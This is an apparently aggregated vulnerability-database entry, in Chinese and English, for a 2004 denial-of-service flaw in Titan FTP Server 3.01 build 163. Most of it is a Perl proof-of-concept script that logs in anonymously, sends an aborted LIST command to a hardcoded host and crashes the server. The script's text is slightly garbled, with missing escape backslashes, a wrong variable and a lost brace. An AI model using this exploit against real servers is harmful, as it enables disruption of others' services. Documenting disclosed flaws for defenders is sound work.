https://www.exploit-db.com/exploits/24080
https://www.securityfocus.com/bid/83157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-007

Titan文件传输服务器3.01build163版本和可能的其他build169之前的版本存在漏洞。远程认证用户通过从系统中分离“LIST-L”命令导致服务拒绝（崩溃），该漏洞导致Titan访问无效的接口。

source: http://www.securityfocus.com/bid/10272/info

Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.

A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.

#!/usr/bin/perl
# Test for Titan FTP server security vulnerability

use IO::Socket;

$host = "192.168.1.243";

my @combination;
$combination[0] = "LIST rn";

for (my $i = 0; $combination[$i] ; $i++)
{
 print "Combination: $1n";

 $remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2112",
     );
 unless ($remote) { die "cannot connect to ftp daemon on $host" }

 print "connectedn";
 while (<$remote>)
 {
  print $_;
  if (/220 /)
  {
   last;
  }
 }

 $remote->autoflush(1);

 my $ftp = "USER anonymousrn";

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/331 /)
  {
   last;
  }
 }

 $ftp = "PASS [email protected]";
 print $remote $ftp;
 print $ftp;
 
 while (<$remote>)
 {
  print $_;
  if (/230 /)
  {
   last;
  }
 }
 
 $ftp = $combination[$i];

 print $remote $ftp;
 print $ftp;

 while (<$remote>)
 {
  print $_;
  if (/150 /)
  {
   last;
  }
 

 close $remote;
}

South River Technologies Titan Ftp Server 3.01 Build 163

来源:XF
名称:titan-list-command-dos(16057)
链接:http://xforce.iss.net/xforce/xfdb/16057
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5RP0215CUU.html
来源:BUGTRAQ
名称:20040505TitanFTPServerAbortedLISTDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108378048513596&w;=2
来源:VULNWATCH
名称:20040505TitanFTPServerAbortedLISTDoS
链接:http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.html